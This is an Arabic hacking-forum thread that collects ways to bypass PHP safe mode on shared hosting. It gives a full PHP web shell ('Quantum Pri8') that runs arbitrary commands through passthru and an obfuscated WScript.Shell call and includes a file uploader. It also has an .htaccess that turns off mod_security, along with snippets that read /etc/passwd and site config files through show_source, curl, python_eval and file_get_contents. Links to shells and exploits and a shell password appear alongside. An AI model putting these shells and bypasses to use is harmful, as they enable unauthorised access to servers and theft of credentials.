مجمع السيف مود ...

السلام عليكم …

في هذا الموضوع نريد من كل فرد يدخله ان يضع درس شاهده عن تخطي السيف مود اي درس باي طريقه …

نبدا بنفسي …

تجميعه لطرق تخطي السيف مود كتابيا :

http://www.alm3refh.com/vb/t23713.html


ننتظركم بدروس مماثله … موققين

تخطي السيف مود والفوربيدن باداة سملنك …

فیدیو:http://www.4shared.com/file/F-DOODHu/SS-Film.html
اسکریبت:http://tool.sun-army.org

المصدر

http://www.v4-team.com/cc/showthread.php?t=69250

طريقه السفاح المشهورة بشرح مفصل

apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit

http://www.securityfocus.com/archive/1/499688

المصدر
http://www.v4-team.com/cc/showthread.php?t=5421

الاتصال بالنت كات لتخطي السيف مود

http://www.mediafire.com/?88lpi51q016n67c

المصدر
http://www.v4-team.com/cc/showthread.php?t=80400

تخطي السيف مود 5.2.13
http://www.4shared.com/file/bbZANz_u/MrP3rfekT.html

باس فك الضغظ

Mr.P3rfekT

وهذا الشل المستخدم اليوزر hacker الباس vbfgr0up

http://www.4shared.com/file/OUG6YOTi/ly0kha_v15.htm

المصدر
http://www.v4-team.com/cc/showthread.php?t=63487

تخطي السيف مود عن طريق ال ftp

http://www.v4-team.com/cc/showthread.php?t=63609

تخطي سيف مود بشيل بيرل

http://www.sec4ever.com/home/showthread.php?p=12012#post12012

تخطي السيف مود + الفوربيدن

http://www.sec4ever.com/home/showthread.php?t=2923

تخطي السيف مود

http://www.sec4ever.com/home/showthread.php?t=4062

تخطي السيف مود باستخدام PHRC

http://www.sec4ever.com/home/showthread.php?t=2901

[b]تخطي الفوربيدن عن طريقة ftp واتباع مسار www

ftp.127.0.0.1/1.txt/www/user/public_html

نضع www بدل home
[/b]

تخطى السيف مود بـ .htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

وملف php.ini

safe_mode = Off
disable_functions = NONE

^^
اضن معروفه لي عوده بطرق اخرى

Windows eXecuter ByPass SafeMode & DisableFunction


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Quantum Pri8 ( Windows eXecuter ByPass SafeMode & DisableFunction )</title>
</head>

<body>

<style type="text/css">
<!--
body, table{font-family:Verdana; font-size:12px;}
table {background-color:#d6d6d6; border-width:0px;}
b {font-family:Arial; font-size:15px;}
a{text-decoration:none;}
-->
</style>
<table border="4" width="100%" id="table1" style="border: 1px line #FFCC99" cellspacing="0" cellpadding="0" height="220">
        <tr align="center" bgcolor="#d6d6d6">

          <td align="center" valign="top" style="border: 1px line #FFCC66"><center><font face="Comic Sans MS" size="1"</font><b>In The Name Of The God</b> <br> Quantum Digital Security Team<br>Quantum Pri8 ( Windows eXecuter ByPass SafeMode & DisableFunction )<br>=========================================================<br>Coded bY Pejvak<br>=========================================================</center>
<?php 
echo "OS : ";echo php_uname();

echo "<br>Disable Functions : ";
if(''==($df=@ini_get('disable_functions'))){echo "None";}else{echo "$df <br>";}

    $dirfile="$file_to_download";

if (file_exists("$dirfile"))
{
header("location: $dirfile");
}
echo("<br>");

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = "<font color=\"red\">ON (Secure)</font>";


}

else {$safemode = false; $hsafemode = "OFF (Not Secure)";}
echo("Safe Mode: $hsafemode");

if ($_GET['action'] == "phpinfo") {
    echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm";
    exit;
}
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = ".$v.";}
else {$openbasedir = false; $hopenbasedir = "OFF (Not Secure)";}
echo("<br>");
echo("Open Base Dir: $hopenbasedir");
echo("<br>");
echo "PostgreSql: ";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "ON";}else{echo "OFF";}
echo("<br>");
echo "MsSql: ";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "ON";}else{echo "OFF";}
echo("<br>");
echo "MySql: ";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "ON"; } else { echo "OFF>"; }
echo("<br>");
echo "PHP version: ".@phpversion();
echo("<br>");
echo "Curl: ".(($curl_on)?("ON"):("OFF"));


?> 
  </tr>

<table border="4" width="100%" id="table1" style="border: 1px line #FFCC99" cellspacing="0" cellpadding="0" height="40">
        <tr align="center" bgcolor="#d6d6d6">

      <td width="79%" rowspan="3" align="center" valign="top" style="border: 1px line #FFCC66">  <?php
if (isset($_GET['dir']))
{
    $current_dir = realpath($_GET['dir'])."/";
}
else
{
    $current_dir = './';
}
echo("<b>Directory</b>");
echo("<br>");


echo wordwrap(realpath($current_dir));?>
  </tr>

<table border="4" width="100%" id="table1" style="border: 1px line #FFCC99" cellspacing="0" cellpadding="0" height="100">
        <tr align="center" bgcolor="#d6d6d6">

          <td align="center" valign="top" style="border: 1px line #FFCC66"><center><font face="Comic Sans MS" size="1"</font><form enctype="multipart/form-data" method="post">
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "shell";}
echo <<<HTML
<b>Command</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="shell">
<tr><td> Execute Via Function <input size="97" type="text" name="c2"><input align="right" type="submit" value="eXecute">
<tr><td> Execute Via Quantum <input size="97" type="text" name="c"><input align="right" type="submit" value="eXecute">
</td></tr>
<tr><td>
<textarea cols="100" rows="20">
HTML;
if (!empty($_POST['c2'])){
passthru($_POST['c2']);
};
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['c']."");
            $stdout = $exec->StdOut();
            $stroutput = $stdout->ReadAll();
            echo $stroutput;
echo "</textarea></td>";




?> 
<table border="4" width="100%" id="table1" style="border: 1px line #FFCC99" cellspacing="0" cellpadding="0" height="100">
        <tr align="center" bgcolor="#d6d6d6">

          <td align="center" valign="top" style="border: 1px line #FFCC66"><center><font face="Comic Sans MS" size="1"</font><form enctype="multipart/form-data" method="post">

<b> Uploader</b><br>
<input type="file" name="file" size="50"><br>
<font style="font-size: 5pt"> </font><br>
<input type="submit" value="Upload"> <br>
 </p></center>

<?php

function check_file()
{
global $file_name, $filename;
    $backupstring = "copy_of_";
    $filename = $backupstring."$filename";

    if( file_exists($filename))
    {
        check_file();
    }
}

if(!empty($file))
{
    $filename = $file_name;
    if( file_exists($file_name))
    {
        check_file();
        echo "<p align=center>[Qn2 Digital Security Team]</p>";
    }

    else
    {
        copy($file,"$filename");
        if( file_exists($filename))
        {
            echo "<p align=center>LoL !!! File Up Shodd</p>";
        }
        elseif(! file_exists($filename))
        {
            echo "<p align=center>‎</p>";
        }
    }
}?>
</tr>
<table border="4" width="100%" id="table1" style="border: 1px line #FFCC99" cellspacing="0" cellpadding="0" height="15">
        <tr align="center" bgcolor="#d6d6d6">
<?
echo("<br>");
echo("SpeciaL TnX : Nashenas,Neo,R3d.w0rm And All Members Quantum Digital Security Team ");
echo("<br>");

echo("WwW.Qn2.OrG");
?>   </tr>
</body>
</html>

المصدر …

http://vulnes.com/showthread.php?t=612

Priv8 - RvSiteBuilder Bypass safe mode

مفروض انو الطريقه لرينو لكن وجدتها هنا حاليا …

http://www.vbspiders.com/vb/t37806.html

التخطي عن طريق اضافه في السي بنل …

تهخطي السيف مود بدوال بي اتش بي


<?
show_source (’/etc/passwd’);
?>

<?

show_source (’/home/user/public_html/config.php’);
?>

<?
highlight_file (”/etc/passwd”);
?>

المكتشف سوبر كرستال في بوك …

المصدر

http://izocin.wordpress.com/2010/08/03/php4-x-php5-2-x-all-show_source-bypasssafe_mode-off/

تخطي السيف مود عن طريق الكيرل …



mkDIR(“file:”);
chdir(“file:”);
mkDIR(“etc”);
chdir(“etc”);
mkDIR(“passwd”);
chdir(“..”);
chdir(“..”);

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, “file:file:///etc/passwd”);
curl_setopt($ch, CURLOPT_HEADER, 0);

curl_exec($ch);

curl_close($ch);mkDIR(“file:”);
chdir(“file:”);
mkDIR(“etc”);
chdir(“etc”);
mkDIR(“passwd”);
chdir(“..”);
chdir(“..”);

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, “file:file:///etc/passwd”);
curl_setopt($ch, CURLOPT_HEADER, 0);

curl_exec($ch);

curl_close($ch);

المصدر …
http://izocin.wordpress.com/2010/08/04/php-eval-code-ile-bypass/

تخطي السيف مود بتغيير الاصدار موجودة من مدة في الموقع لكن الان اخدتها من

http://izocin.wordpress.com/2010/08/03/litespeed-forcetype-bypass/


<Files *.php>
ForceType application/x-httpd-php4
</Files>

انا صراحة اعتبر هذا الموقع افضل موقع بقصص التخطي …

PHP Python Extention and Eval Safe_mode Bypass


eval code:

$code= python_eval(‘
import os
pwd = os.getcwd()
print pwd
os.system(‘cat /etc/passwd’)
‘);

المصدر
http://izocin.wordpress.com/2010/08/03/php-python-extention-and-eval-safe_mode-bypass/

php 5.2.5 safe mode bypass

المصدر :

http://www.bugreport.ir/22/exploit.htm

تخطي السيف مود بالطريقه التاليه …


<?php 
$m='1.txt'
$x=file_get_contents('/etc/passwd');
file_put_contents($m,$x);
?>

بتلاقي الملف موجود في ملف 1.txt …